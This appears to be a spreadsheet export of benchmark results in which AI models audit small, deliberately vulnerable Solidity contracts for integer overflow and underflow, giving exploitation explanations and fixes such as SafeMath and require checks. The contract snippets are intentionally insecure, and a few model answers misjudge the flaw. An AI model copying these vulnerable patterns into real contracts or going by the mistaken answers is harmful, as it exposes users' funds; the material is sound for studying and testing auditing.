4. The potential solutions of these vulnerabilities:
a. Use the SafeMath library or similar arithmetic overflow/underflow protections for all mathematical operations.
b. Check conditions before performing the subtraction to ensure `map[k]` is greater than or equal to `v`. If not, revert the transaction or handle the error appropriately."</t>
  </si>
  <si>
    <t>dataset/arithmetic/integer_overflow_minimal.sol</t>
  </si>
  <si>
    <t xml:space="preserve">    function run(uint256 input) public {
        count -= input;
    }</t>
  </si>
  <si>
    <t>Let's first read and analyze the provided Solidity code snippet to determine if there are any vulnerabilities.
1. Are there any vulnerabilities? 
**Yes.**
2. how this vulnerability can be exploited :
There's an integer underflow vulnerability in the `run` function. Specifically, the line `count -= input;` allows for the `count` value to underflow if a user provides a value of `input` greater than the current value of `count`.
3. The business impact of these vulnerabilities in one sentence:
The `run` function leads to an integer underflow, potentially causing unexpected behaviors in contract logic depending on the use of the `count` variable.
4. The potential solutions of this vulnerabilities:
- Use the SafeMath library (or a similar library) to handle arithmetic operations, which includes checks to prevent overflows and underflows.
- Add explicit checks before subtracting to ensure that the `input` is not greater than `count`.
- Update the Solidity compiler version (the provided code uses an old version `^0.4.19`), as newer versions have built-in overflow and underflow checks.</t>
  </si>
  <si>
    <t>1. Is there any vulnerabilities? 
Yes.
2. Explain in details how this vulnerability can be exploited:
The vulnerability in the given contract is an integer underflow. In Solidity, uint (unsigned integer) variables can't be negative. If you subtract a larger number from a smaller one, the result will wrap around to a very large number, close to 2^256. This is because Solidity uses modular arithmetic for these operations. The `run` function in this contract accepts a `uint256` input and subtracts it from `count` which is initially 1. If the input value is greater than 1, this will cause an underflow and `count` will be set to a very large value.
3. The business impact of this vulnerabilities in one sentence: 
The `run` function leads to integer underflow, which can lead to incorrect logic in the contract and can potentially be exploited for financial gain if `count` is used in critical calculations or logic.
4. The potential solutions of this vulnerabilities:
The solution for this vulnerability is to perform checks before subtraction to prevent underflow. This can be achieved by using the SafeMath library in Solidity which provides functions for safe arithmetic operations. Alternatively, starting from Solidity version 0.8.0, the language has built-in overflow and underflow protection. If an underflow or overflow occurs, it will revert the transaction. Therefore, upgrading to a newer version of Solidity is a viable solution as well. Here is a version of the contract that uses the SafeMath library for secure operations:
```solidity
pragma solidity ^0.4.19;
import "https://github.com/OpenZeppelin/openzeppelin-contracts/blob/v2.5.1/contracts/math/SafeMath.sol";
contract IntegerOverflowMinimal {
    using SafeMath for uint;
    uint public count = 1;
    function run(uint256 input) public {
        count = count.sub(input);
    }
}
```
And here is the contract using Solidity version 0.8.0 with built-in underflow protection:
```solidity
pragma solidity ^0.8.0;
contract IntegerOverflowMinimal {
    uint public count = 1;
    function run(uint256 input) public {
        count -= input;
    }
}
```</t>
  </si>
  <si>
    <t>Let's begin by reading and examining the provided Solidity code to identify any arithmetic vulnerabilities.
The Solidity code provided defines a contract `IntegerOverflowMinimal` with a state variable `count` initialized to 1. The contract also has a public function `run` that subtracts the input value from `count`.
1. Are there any arithmetic vulnerabilities? 
**Answer:** Yes.
2. how this vulnerability can be exploited :
The vulnerability in this code is an integer underflow. If the function `run` is called with a value greater than `count` (for example, 2 when count is 1), the subtraction will cause an integer underflow. This will result in `count` wrapping around to a very large value.
3. The business impact of these vulnerabilities in one sentence:
The `run` function leads to unintended large values due to integer underflow.
4. The potential solutions of this vulnerabilities:
- Use the SafeMath library for arithmetic operations which ensures that operations like subtraction and addition are safe against overflows and underflows.
- Implement manual checks to prevent subtraction if the input is greater than `count`.
- Upgrade the Solidity version to one that provides native protection against integer underflows and overflows.</t>
  </si>
  <si>
    <t>1. Are there any arithmetic vulnerabilities? 
**Yes.**
2. how this vulnerability can be exploited :
The `count -= input;` line is susceptible to underflow. Solidity's native arithmetic operations do not throw an error when underflow or overflow occurs. If `input` is greater than `count`, then `count` will underflow, resulting in a very large value.
3. The business impact of these vulnerabilities in one sentence: 
Underflow vulnerability in the `run` function leads to unintended high values of `count`.
4. The potential solutions of these vulnerabilities:
- Use the `SafeMath` library for arithmetic operations which includes checks for overflows and underflows. Replace `count -= input;` with `count = SafeMath.sub(count, input);`.
- Manually check for underflows before performing the subtraction:
  ```solidity
  require(input &lt;= count, "Input too large, leads to underflow");
  count -= input;
  ```</t>
  </si>
  <si>
    <t>dataset/arithmetic/integer_overflow_mul.sol</t>
  </si>
  <si>
    <t xml:space="preserve">    function run(uint256 input) public {
        count *= input;
    }</t>
  </si>
  <si>
    <t>Let's start by reading and analyzing the provided Solidity code snippet.
The provided Solidity code defines a contract named `IntegerOverflowMul` with a state variable `count` initialized to `2`. The contract also has a `run` function that multiplies the `count` variable with the provided `input`.
1. Are there any vulnerabilities? 
**Yes.**
2. how this vulnerability can be exploited :
The code is vulnerable to integer overflow. The multiplication operation in the `run` function can result in overflow if `input` is sufficiently large. The Solidity language does not throw an error on integer overflow by default, which means the value of `count` can wrap around and become very small or even zero.
For instance, if `count` is \(2^{255}\) and `input` is `2`, the result of the multiplication will exceed the maximum value of a `uint256` and will wrap around to `0`.
3. The business impact of these vulnerabilities in one sentence:
The `run` function leads to potential integer overflow, which can result in unexpected and incorrect values of the `count` state variable.
4. The potential solutions of these vulnerabilities:
- Use the SafeMath library or equivalent for arithmetic operations. The SafeMath library provides functions for arithmetic operations that throw errors when overflow or underflow occurs.
- Add checks before the multiplication to ensure that the resulting value will not exceed the maximum value for a `uint256`.
- Consider upgrading the Solidity version to leverage built-in overflow and underflow checks in newer versions of the language.</t>
  </si>
  <si>
    <t>1. Is there any vulnerabilities? 
Yes.
2. Proof of concept of this vulnerability:
The vulnerability in this contract is that of an integer overflow. Integer overflow occurs when an arithmetic operation attempts to create a numeric value that is outside of the range that can be represented with a given number of bits – either larger than the maximum or lower than the minimum representable value. In Solidity, if a uint (unsigned integer) variable exceeds its maximum value (2^256 - 1), it wraps around to zero. This is an integer overflow. In the provided contract, the `run` function multiplies the `count` state variable with an input variable without checking whether the multiplication would result in an integer overflow.
3. The business impact of this vulnerability in one sentence:
The `run` function leads to potential integer overflow, allowing an attacker to manipulate the `count` state variable, potentially causing inaccurate calculation or logic errors in the smart contract.
4. The potential solutions of this vulnerability:
The potential solutions to prevent this overflow are:
a. Use the SafeMath library for arithmetic operations. SafeMath provides functions for all arithmetic operations and automatically checks for overflows and underflows. Here is how you would modify the `run` function to use SafeMath:
    ```
    pragma solidity ^0.4.19;
    import "./SafeMath.sol";
    contract IntegerOverflowMul {
        using SafeMath for uint;
        uint public count = 2;
        function run(uint256 input) public {
            count = count.mul(input);
        }
    }
    ```
b. Manually check for overflows. This is more error-prone than using SafeMath, but if you prefer not to use additional libraries, you could add a check like this:
    ```
    pragma solidity ^0.4.19;
    contract IntegerOverflowMul {
        uint public count = 2;
        function run(uint256 input) public {
            if (input != 0 &amp;&amp; count * input / input != count) {
                revert("Multiplication overflow");
            }
            count *= input;
        }
    }
    ```
Both of these solutions ensure that the multiplication operation in the `run` function does not overflow.</t>
  </si>
  <si>
    <t>dataset/arithmetic/integer_overflow_multitx_multifunc_feasible.sol</t>
  </si>
  <si>
    <t xml:space="preserve">    function run(uint256 input) {
        if (initialized == 0) {
            return;
        }
        count -= input;
    }</t>
  </si>
  <si>
    <t>Alright, I'll start by examining the code in the file `integer_overflow_multitx_multifunc_feasible.sol`. Once I've analyzed it, I'll provide my response in the format you've requested.
The provided Solidity code is as follows:
```solidity
pragma solidity ^0.4.23;
contract IntegerOverflowMultiTxMultiFuncFeasible {
    uint256 private initialized = 0;
    uint256 public count = 1;
    function init() public {
        initialized = 1;
    }
    function run(uint256 input) {
        if (initialized == 0) {
            return;
        }
        count -= input;
    }
}
```
1. **Are there any vulnerabilities?**
Yes.
2. **how this vulnerability can be exploited :**
The vulnerability in this contract is an integer underflow in the `run` function. When `count` (which is initialized to 1) has a value subtracted from it that is greater than its current value, it will underflow and wrap around to a very large number.
For example, if `count` is 1 and `input` is 2, then after executing `count -= input;`, the value of `count` will be `2^256 - 1` due to the underflow.
3. **The business impact of these vulnerabilities in one sentence:**
The `run` function leads to an integer underflow, potentially resulting in unexpected and large values for the `count` variable.
4. **The potential solutions of these vulnerabilities:**
- Implement safe arithmetic operations (e.g., using OpenZeppelin's SafeMath library) to prevent overflows and underflows.
- Check for underflow conditions before performing subtraction in the `run` function. For instance:
  ```solidity
  require(input &lt;= count, "Input value is too large");
  count -= input;
  ```</t>
  </si>
  <si>
    <t>1. Yes, there is a vulnerability.
2. Proof of concept of this vulnerability: This function contains an underflow vulnerability. The function `run(uint256 input)` decrements the `count` variable by `input`. However, the function does not check if `input` is greater than `count`. Since `uint256` is an unsigned integer, subtracting a larger number from a smaller one will result in underflow, causing the variable to wrap around to a very large value.
3. The business impact of this vulnerability in one sentence: The `run` function leads to the count variable potentially underflowing and becoming a very large number, which could disrupt the logic and flow of the smart contract.
4. The potential solution to this vulnerability: A solution to this vulnerability would be to add a requirement or condition to check if `input` is less than or equal to `count` before executing the subtraction operation. Here is a revised version of the function with this safeguard:
```solidity
function run(uint256 input) {
    require(input &lt;= count, "Input should be less than or equal to count");
    if (initialized == 0) {
        return;
    }
    count -= input;
}
```</t>
  </si>
  <si>
    <t>dataset/arithmetic/integer_overflow_multitx_onefunc_feasible.sol</t>
  </si>
  <si>
    <t xml:space="preserve">    function run(uint256 input) public {
        if (initialized == 0) {
            initialized = 1;
            return;
        }
        count -= input;
    }
}</t>
  </si>
  <si>
    <t>Alright, let's start by reading and understanding the provided Solidity code.
I've reviewed the provided Solidity code. Let's analyze it:
1. **Are there any vulnerabilities?**
   - **Answer**: Yes.
2. **how this vulnerability can be exploited :**
   - The `run` function allows for an integer underflow on the `count` variable. This happens when the `count` variable is decremented by a value (`input`) that's larger than the current value of `count`. For instance, if `count` is currently 1 and we call `run(2)`, the result will be a large number due to the integer underflow.
3. **The business impact of these vulnerabilities in one sentence:**
   - The `run` function leads to unintended large values of the `count` variable due to integer underflow.
4. **The potential solutions of these vulnerabilities:**
   - Implement input validation checks in the `run` function to ensure the `input` value is less than or equal to the current value of `count` before performing the subtraction.
   - Use SafeMath (or a similar library) for arithmetic operations to prevent integer underflows and overflows. SafeMath will throw an exception when an underflow or overflow occurs, preventing the erroneous transaction from being processed.</t>
  </si>
  <si>
    <t>1. Yes, there are potential vulnerabilities in this code. 
2. how this vulnerability can be exploited :
    - Underflow vulnerability: Solidity uses uint256 (unsigned integer 256 bits) for the `count` and `input` variables. The underflow problem occurs when `count` is less than `input` and the operation `count - input` is performed. This operation does not throw an error but wraps around the maximum possible value for uint256, which is \(2^{256}-1\).
    - Unprotected self state modification: The `initialized` state variable is set without any access control. This means that any external account or contract can call this function and change the `initialized` state, which might not be the intended behaviour.
3. The business impact of these vulnerabilities:
    - Underflow vulnerability: The `run` function leads to incorrect financial calculations or operations, leading to possible financial losses or unanticipated behaviour of the contract.
    - Unprotected self state modification: The `run` function leads to unwanted changes in the state of the contract, which can cause the contract to behave in unexpected ways.
4. The potential solutions of these vulnerabilities:
    - Underflow vulnerability: Use the SafeMath library for subtraction operation or check if `count` is greater than `input` before subtraction. This will prevent underflow.
        Example with SafeMath:
        ```
        using SafeMath for uint256;
        count = count.sub(input);
        ```
        Or using a condition:
        ```
        require(count &gt;= input, "Subtraction underflow");
        count -= input;
        ```
    - Unprotected self state modification: Add a modifier to check whether the caller has the required permissions to change the `initialized` state.
        Example:
        ```
        modifier onlyOwner() {
            require(msg.sender == owner, "Caller is not owner");
            _;
        }
        function run(uint256 input) public onlyOwner {
            if (initialized == 0) {
                initialized = 1;
                return;
            }
            require(count &gt;= input, "Subtraction underflow");
            count -= input;
        }
        ```</t>
  </si>
  <si>
    <t>dataset/arithmetic/overflow_simple_add.sol</t>
  </si>
  <si>
    <t xml:space="preserve">    function add(uint256 deposit) public {
        balance += deposit;
    }</t>
  </si>
  <si>
    <t>Alright, I will start by reading the provided Solidity code to understand its functionality and then proceed with the vulnerability analysis as requested.
The provided Solidity code is:
```solidity
pragma solidity 0.4.25;
contract Overflow_Add {
    uint public balance = 1;
    function add(uint256 deposit) public {
        balance += deposit;
    }
}
```
1. Are there any vulnerabilities? 
**Yes.**
2. how this vulnerability can be exploited :
The `add` function allows a user to add a `deposit` amount to the `balance`. However, there is no check to prevent an overflow of the `balance` variable. If a large enough value is added to the `balance`, it will overflow and wrap around to a smaller value.
3. The business impact of these vulnerabilities in one sentence:
The `add` function leads to potential integer overflow, resetting the `balance` to an unexpected low value.
4. The potential solutions of this vulnerabilities:
- Add overflow checks to ensure that the `balance` does not exceed its maximum value.
- Consider using SafeMath library or other libraries that provide overflow and underflow protection for arithmetic operations in Solidity.</t>
  </si>
  <si>
    <t>1. Is there any vulnerabilities? 
Answer: Yes.
2. Explain in details how this vulnerability can be exploited:
The 'add' function in this code does not have any access control mechanism, meaning any address can call this function and increase the balance. In a typical contract, only authorized addresses (like the contract owner or specific addresses with privileges) should be able to change the balance.
3. The business impact of this vulnerabilities in one sentence:
The 'add' function leads to unauthorized manipulation of the contract balance.
4. The potential solutions of this vulnerabilities:
A solution to this vulnerability would be to include an access control mechanism, such as a modifier, to restrict who can call the 'add' function. This could be implemented using the 'onlyOwner' modifier if you want only the contract's owner to be able to call this function. Here is an example:
```solidity
modifier onlyOwner() {
    require(msg.sender == owner, "Caller is not owner");
    _;
}
function add(uint256 deposit) public onlyOwner {
    balance += deposit;
}
```
In this updated code, the 'onlyOwner' modifier checks that the caller of the 'add' function is the owner of the contract. If it's not, the function call is rejected and an error message is returned. This way, only the owner of the contract can change the balance.</t>
  </si>
  <si>
    <t>dataset/arithmetic/overflow_single_tx.sol</t>
  </si>
  <si>
    <t xml:space="preserve">    function overflowaddtostate(uint256 input) public {
        count += input;
    }</t>
  </si>
  <si>
    <t>Alright, let's start by reading and analyzing the provided Solidity code.
1. Are there any vulnerabilities?
**Yes.**
2. how this vulnerability can be exploited :
- In the functions `overflowaddtostate`, `overflowmultostate`, and `underflowtostate`, there are no checks for integer overflow and underflow, which can lead to unexpected values in the `count` state variable.
- Specifically:
  - For `overflowaddtostate`: If `count` is a large value and `input` is also a large value, their sum might exceed the maximum value for `uint256`, causing it to wrap around to a small number.
  - For `overflowmultostate`: If `count` and `input` are both large values, their product might exceed the maximum value for `uint256`, causing it to wrap around.
  - For `underflowtostate`: If `input` is greater than `count`, subtracting `input` from `count` will result in a negative value, but since `uint256` is unsigned, it will wrap around to a very large number.
3. The business impact of these vulnerabilities in one sentence:
- **Incorrect arithmetic operations lead to unexpected contract state values.**
4. The potential solutions to these vulnerabilities:
- Use the SafeMath library for Solidity or similar safe arithmetic operations to prevent overflow and underflow. This library provides functions for arithmetic operations that throw exceptions when overflows or underflows occur.
- Implement checks before performing arithmetic operations. For example, for addition, ensure that the result is always greater than one of the operands. For subtraction, ensure that the second operand is always less than or equal to the first operand.
- Regularly audit and test the contract for potential vulnerabilities, including those related to arithmetic operations.</t>
  </si>
  <si>
    <t>1. Are there any arithmetic vulnerabilities? 
**Yes.**
2. how this vulnerability can be exploited :
The function `overflowaddtostate` can result in an arithmetic overflow. In Solidity, if the sum of `count` and `input` exceeds the maximum value of a `uint256` (which is \(2^{256} - 1\)), it will wrap around to zero and start increasing from there. For example, if `count` is \(2^{256} - 1\) and `input` is 1, then the result will be 0.
3. The business impact of these vulnerabilities in one sentence:
The `overflowaddtostate` function leads to unintended changes in the state, causing potential loss of funds or incorrect logic in the contract.
4. The potential solutions of these vulnerabilities:
- Use the SafeMath library in Solidity which provides functions that throw an exception when overflows occur.
- Manually check for overflows by ensuring that the new value of `count` after the addition is greater than its previous value. If not, revert the transaction.</t>
  </si>
  <si>
    <t>Alright, I'll start by reading the provided Solidity code to analyze it for any arithmetic vulnerabilities.
1. **Are there any arithmetic vulnerabilities?**
   - Yes.
2. **how this vulnerability can be exploited :**
   - `overflowaddtostate(uint256 input)` function: The addition operation can overflow if the `input` is large enough. For instance, if `count` is \(2^{256} - 1\) and `input` is 2, the result will overflow and `count` will be 1.
   - `overflowmultostate(uint256 input)` function: The multiplication operation can overflow if `input` is large enough. For example, if `count` is \(2^{256} - 1\) and `input` is 2, the result will overflow.
   - `underflowtostate(uint256 input)` function: The subtraction operation can underflow if `input` is larger than `count`. For instance, if `count` is 1 and `input` is 2, the result will underflow and `count` will be \(2^{256} - 1\).
   - `overflowlocalonly(uint256 input)` function: This function has an addition operation that can overflow, but since the result is not stored in any state variable, it won't affect the contract state.
   - `overflowmulocalonly(uint256 input)` function: This function has a multiplication operation that can overflow, but again, it won't affect the contract state as the result is not stored.
   - `underflowlocalonly(uint256 input)` function: This function has a subtraction operation that can underflow. The result is not stored in the contract state, so it won't have any lasting effect.
3. **The business impact of these vulnerabilities in one sentence:**
   - Arithmetic overflow and underflow in functions lead to unintended state changes in the contract, potentially compromising its integrity.
4. **The potential solutions of these vulnerabilities:**
   - For the `overflowaddtostate(uint256 input)` function, check if the addition will overflow before executing it. An example solution would be:
     ```solidity
     require(count + input &gt;= count, "Addition overflow");
     count += input;
     ```
   - For the `overflowmultostate(uint256 input)` function, check if the multiplication will overflow before executing it. An example solution would be:
     ```solidity
     require(count == 0 || count * input / count == input, "Multiplication overflow");
     count *= input;
     ```
   - For the `underflowtostate(uint256 input)` function, check if the subtraction will underflow before executing it. An example solution would be:
     ```solidity
     require(count &gt;= input, "Subtraction underflow");
     count -= input;
     ```
   - For the functions with local arithmetic operations (`overflowlocalonly`, `overflowmulocalonly`, and `underflowlocalonly`), even though they don't affect the contract state, it would be best practice to include checks for arithmetic overflows and underflows for security and clarity.</t>
  </si>
  <si>
    <t xml:space="preserve">    function overflowmultostate(uint256 input) public {
        count *= input;
    }</t>
  </si>
  <si>
    <t>1. Are there any arithmetic vulnerabilities? 
   **Yes.**
2. how this vulnerability can be exploited :
   The function `overflowmultostate` multiplies the state variable `count` with the input `input`. If `input` is a large value, this multiplication can cause an overflow in the `uint256` data type. For instance, if `count` is `2**255` (half the maximum value of `uint256`) and `input` is `2`, the result would overflow and wrap around to `0`.
3. The business impact of these vulnerabilities in one sentence:
   **Unrestricted multiplication leads to potential integer overflow and unintended changes to the `count` state variable.**
4. The potential solutions of these vulnerabilities:
   - Use the SafeMath library (or similar utilities) for arithmetic operations. SafeMath provides functions that throw exceptions on overflows.
   - Add a condition to check for overflow before performing the multiplication.
   - Consider limiting the range of acceptable values for `input` to prevent overflows.</t>
  </si>
  <si>
    <t xml:space="preserve">    function underflowtostate(uint256 input) public {
        count -= input;
    }</t>
  </si>
  <si>
    <t xml:space="preserve">    function overflowlocalonly(uint256 input) public {
        uint res = count + input;
    }</t>
  </si>
  <si>
    <t>1. Are there any vulnerabilities? 
Answer: Yes.
2. how this vulnerability can be exploited :
The code is susceptible to integer overflow. The operation `uint res = count + input;` can overflow if the sum of `count` and `input` exceeds the maximum value that can be stored in a `uint256`.
3. The business impact of these vulnerabilities in one sentence: 
The `overflowlocalonly` function leads to potential integer overflow, which could result in incorrect arithmetic calculations and potentially unintended behavior.
4. The potential solutions to this vulnerability:
- Use the SafeMath library for arithmetic operations which provides overflow and underflow checks.
- Add manual checks before performing the addition to ensure that the result will not exceed the maximum value of `uint256`.
- Consider reducing the visibility of the function to `internal` if it is not intended to be called from outside contracts. This will limit potential attack vectors.</t>
  </si>
  <si>
    <t xml:space="preserve">    function overflowmulocalonly(uint256 input) public {
        uint res = count * input;
    }</t>
  </si>
  <si>
    <t>1. Are there any vulnerabilities? 
Yes.
2. how this vulnerability can be exploited :
The function `overflowmulocalonly` has an integer overflow vulnerability. If `count` and `input` are both sufficiently large values, their multiplication will result in an overflow, causing the value of `res` to wrap around.
For example, let's assume `count` is \(2^{255}\) (half of the maximum value of a `uint256`) and `input` is 2. The result would be \(2^{256}\), but since `uint256` can only store values up to \(2^{256} - 1\), the result will wrap around and `res` will be set to 0.
3. The business impact of these vulnerabilities in one sentence:
The `overflowmulocalonly` function leads to incorrect computation due to integer overflow.
4. The potential solutions of this vulnerabilities:
- Use the SafeMath library (or similar libraries) for arithmetic operations. This library provides functions that throw an exception when overflows or underflows occur. For example, using SafeMath:
  ```solidity
  using SafeMath for uint256;
  function overflowmulocalonly(uint256 input) public {
      uint res = count.mul(input);
  }
  ```
- Add manual checks before multiplication to ensure that the result won't exceed \(2^{256} - 1\). If it would, revert the transaction or handle the error in some other way.
  ```solidity
  require(input == 0 || (count &lt;= ((2**256 - 1) / input)));
  uint res = count * input;
  ```</t>
  </si>
  <si>
    <t xml:space="preserve">    function underflowlocalonly(uint256 input) public {
               uint res = count - input;
    }</t>
  </si>
  <si>
    <t>1. Are there any vulnerabilities? 
   **Yes.**
2. how this vulnerability can be exploited :
   The code is vulnerable to an integer underflow. If `input` is greater than `count`, then the result `res` will wrap around to a very large value due to how unsigned integers behave in Solidity.
   For instance, if `count` is 5 and `input` is 10, `res` will not be \(-5\) (since unsigned integers cannot be negative). Instead, it will be a large value close to the maximum possible value for `uint256`.
3. The business impact of these vulnerabilities in one sentence:
   The `underflowlocalonly` function leads to unintended high values due to integer underflows.
4. The potential solutions of these vulnerabilities:
   - Use the SafeMath library, which provides functions that handle overflows and underflows by throwing errors.
   - Explicitly check if `input` is greater than `count` before performing the subtraction, and handle the error or revert the transaction.
   - Upgrade to a newer version of Solidity which has built-in overflow and underflow checks.</t>
  </si>
  <si>
    <t>dataset/arithmetic/timelock.sol</t>
  </si>
  <si>
    <t xml:space="preserve">     function increaseLockTime(uint _secondsToIncrease) public {
         lockTime[msg.sender] += _secondsToIncrease;
     }</t>
  </si>
  <si>
    <t>Let me first read the provided Solidity code to analyze it for potential vulnerabilities.
Here's the provided Solidity code:
```solidity
pragma solidity ^0.4.0;
contract TimeLock {
    mapping(address =&gt; uint) public balances;
    mapping(address =&gt; uint) public lockTime;
    function deposit() public payable {
        balances[msg.sender] += msg.value;
        lockTime[msg.sender] = now + 1 weeks;
    }
    function increaseLockTime(uint _secondsToIncrease) public {
        lockTime[msg.sender] += _secondsToIncrease;
    }
    function withdraw() public {
        require(balances[msg.sender] &gt; 0);
        require(now &gt; lockTime[msg.sender]);
        uint transferValue = balances[msg.sender];
        balances[msg.sender] = 0;
        msg.sender.transfer(transferValue);
    }
}
```
Analysis:
1. **Are there any vulnerabilities?**
   - Yes.
2. **how this vulnerability can be exploited :**
   - Use of `now`: The use of `now` (alias for `block.timestamp`) can be manipulated by miners to some extent. This can potentially affect the behavior of the contract in unexpected ways.
   - `increaseLockTime` function: This function allows a user to extend their lock time indefinitely, potentially locking their funds forever. It can be called multiple times without any limitations.
3. **The business impact of these vulnerabilities in one sentence:**
   - The manipulability of `block.timestamp` can lead to unexpected contract behavior, and users can unintentionally lock their funds indefinitely using the `increaseLockTime` function.
4. **The potential solutions of these vulnerabilities:**
   - Replace the use of `now` with a more secure and less manipulable time source if possible. However, it's important to note that the extent of miner manipulation is limited, so the impact might be minimal in practical terms.
   - Add limitations or checks in the `increaseLockTime` function to prevent users from locking their funds indefinitely. For instance, you could put a maximum lock time or require a reason/justification for significant extensions.
Let's further explore each vulnerability in detail.
**Detailed Analysis and Solutions:**
### Vulnerability 1: Use of `now`
#### Analysis:
The `now` keyword in Solidity is an alias for `block.timestamp`. It represents the current block's timestamp. However, it's worth noting that miners have a small ability to manipulate this value. While the extent of this manipulation is limited (usually within 900 seconds), it's still a potential vulnerability in time-sensitive contracts.
#### Business Impact:
Manipulation of `block.timestamp` by miners could lead to unexpected contract behavior.
#### Solution:
If precise time measurements are crucial, consider using an external oracle to fetch the current time. However, for many use cases, the potential miner manipulation might be negligible. If you continue using `block.timestamp`, be aware of its limitations and design the contract to be resilient against small deviations.
### Vulnerability 2: `increaseLockTime` function
#### Analysis:
The `increaseLockTime` function allows users to extend their lock time indefinitely. A user can repeatedly call this function, each time adding more seconds to their lock time, potentially leading to a situation where they can't access their funds for an extremely long period.
#### Business Impact:
Users can unintentionally lock their funds indefinitely using the `increaseLockTime` function.
#### Solution:
1. **Limit the Increase**: You could set a maximum limit to how much a user can extend their lock time. This ensures that they can't lock their funds indefinitely.
2. **Confirmation Mechanism**: Another approach could be to require a two-step process for significant time extensions. For instance, a user might request an extension, but it only becomes effective after a certain waiting period or after they confirm it again.
3. **Administrator Override**: Implement a function that, under extreme circumstances and with proper justification, allows an administrator to unlock funds. This function should be used with caution and transparency to avoid centralization concerns.
Overall, while the provided code has vulnerabilities, they can be mitigated with careful design and by being aware of the potential pitfalls in smart contract development.</t>
  </si>
  <si>
    <t>1. Is there any vulnerabilities? 
Yes.
2. Explain in details how this vulnerability can be exploited:
This function allows a user to indefinitely increase their lock time. In a situation where lockTime should decrease or remain constant over time (e.g., in a staking contract), this could be a problem. An attacker could potentially keep their funds locked indefinitely, and if the system has some kind of reward mechanism based on lock time, they could exploit this to earn more rewards.
3. The business impact of this vulnerabilities in one sentence:
The `increaseLockTime` function leads to potential abuse of the system's lock mechanism, potentially disrupting reward distribution or other system dynamics.
4. The potential solutions of this vulnerabilities:
- Adding a maximum limit to the `lockTime` for a user. This prevents a user from extending their lock time indefinitely.
- Requiring special privileges to call the `increaseLockTime` function. Only a system administrator or a smart contract with specific permissions should be able to increase the lock time.
- Implementing a decreasing function for `lockTime`. This could be a function that decreases `lockTime` over time or a function that a user can call to decrease their `lockTime`. This makes it harder for a user to keep their funds locked indefinitely.</t>
  </si>
  <si>
    <t>Let's start by reading and analyzing the provided Solidity code. I will look for arithmetic vulnerabilities, specifically issues like integer overflow, underflow, or any other arithmetic-related issues that could affect the contract's intended behavior.
Here's the provided Solidity code:
```solidity
pragma solidity ^0.4.0;
contract TimeLock {
    mapping(address =&gt; uint) public balances;
    mapping(address =&gt; uint) public lockTime;
    function deposit() public payable {
        balances[msg.sender] += msg.value;
        lockTime[msg.sender] = now + 1 weeks;
    }
    function increaseLockTime(uint _secondsToIncrease) public {
        lockTime[msg.sender] += _secondsToIncrease;
    }
    function withdraw() public {
        require(balances[msg.sender] &gt; 0);
        require(now &gt; lockTime[msg.sender]);
        uint transferValue = balances[msg.sender];
        balances[msg.sender] = 0;
        msg.sender.transfer(transferValue);
    }
}
```
Based on the provided code, I will analyze it for arithmetic vulnerabilities:
1. Are there any arithmetic vulnerabilities?
Let's check the code.
1. Are there any arithmetic vulnerabilities?
Answer: Yes.
2. how this vulnerability can be exploited :
- In the `deposit()` function, the line `balances[msg.sender] += msg.value;` can be vulnerable to an overflow if `msg.value` is manipulated in such a way that when added to `balances[msg.sender]`, it exceeds the maximum representable `uint` value.
- In the `increaseLockTime(uint _secondsToIncrease)` function, the line `lockTime[msg.sender] += _secondsToIncrease;` is also susceptible to overflow if `_secondsToIncrease` is a large value.
3. The business impact of these vulnerabilities in one sentence:
The overflow vulnerabilities in the `deposit()` and `increaseLockTime()` functions can lead to incorrect balance and lock time values, potentially allowing unauthorized withdrawals or indefinite locking of funds.
4. The potential solutions of these vulnerabilities:
- For the `deposit()` function: Implement a check to ensure that the sum of `balances[msg.sender]` and `msg.value` does not exceed the maximum value for `uint`.
- For the `increaseLockTime(uint _secondsToIncrease)` function: Implement a check to ensure that adding `_secondsToIncrease` to `lockTime[msg.sender]` does not result in an overflow. 
It's also worth noting that using the `now` keyword (alias for `block.timestamp`) can be manipulated by miners to a certain extent. However, this is not an arithmetic vulnerability, so it's just an additional observation.</t>
  </si>
  <si>
    <t>1. Are there any arithmetic vulnerabilities? 
**Yes.**
2. how this vulnerability can be exploited :
The line `lockTime[msg.sender] += _secondsToIncrease;` is susceptible to an integer overflow. If `lockTime[msg.sender]` is close to the maximum value for its type and `_secondsToIncrease` is a large number, their sum could wrap around to a small number, effectively resetting the `lockTime`.
3. The business impact of these vulnerabilities in one sentence:
Integer overflow in the `increaseLockTime` function leads to unintended reset or decrease of lock time.
4. The potential solutions to these vulnerabilities:
- Use the SafeMath library or similar mechanisms to ensure safe arithmetic operations, which will throw an exception when overflow occurs.
- Before adding, check if the sum would exceed the maximum allowed value and handle the situation accordingly, either by capping the value or reverting the transaction.</t>
  </si>
  <si>
    <t>dataset/arithmetic/token.sol</t>
  </si>
  <si>
    <t xml:space="preserve">   function transfer(address _to, uint _value) public returns (bool) {
     require(balances[msg.sender] - _value &gt;= 0);
     balances[msg.sender] -= _value;
     balances[_to] += _value;
     return true;
   }</t>
  </si>
  <si>
    <t>Alright, let's start by reading the provided Solidity code to understand its functionality and then analyze it for vulnerabilities.
Here's a breakdown of the provided Solidity code:
```solidity
pragma solidity ^0.4.18;
contract Token {
    mapping(address =&gt; uint) balances;
    uint public totalSupply;
    function Token(uint _initialSupply) {
        balances[msg.sender] = totalSupply = _initialSupply;
    }
    function transfer(address _to, uint _value) public returns (bool) {
        require(balances[msg.sender] - _value &gt;= 0);
        balances[msg.sender] -= _value;
        balances[_to] += _value;
        return true;
    }
    function balanceOf(address _owner) public constant returns (uint balance) {
        return balances[_owner];
    }
}
```
Let's analyze the code for vulnerabilities:
1. **Vulnerabilities?** 
   Yes.
2. **how this vulnerability can be exploited :** 
   - The `transfer` function is vulnerable to an integer underflow. The line `require(balances[msg.sender] - _value &gt;= 0);` checks if the sender has enough balance. However, since `uint` is an unsigned integer, it will always be greater than or equal to 0. If `_value` is greater than `balances[msg.sender]`, it will wrap around to a very large number.
   - The `transfer` function is also vulnerable to an integer overflow in the line `balances[_to] += _value;`. If `_value` is a very large number and when added to `balances[_to]`, it can wrap around to a smaller number.
3. **The business impact of these vulnerabilities in one sentence:** 
   - Integer underflow in the `transfer` function leads to unauthorized token transfers.
   - Integer overflow in the `transfer` function leads to incorrect token balance updates.
4. **The potential solutions to these vulnerabilities:** 
   - Use the SafeMath library (or similar) to perform arithmetic operations safely, preventing underflows and overflows.
   - Update the `require` statement in the `transfer` function to check the balance of the sender against the value they want to transfer more explicitly.
   - Add a check after the `balances[_to] += _value;` line to ensure that the recipient's new balance is greater than their old balance.
Would you like a more detailed explanation of the vulnerabilities or the suggested solutions?</t>
  </si>
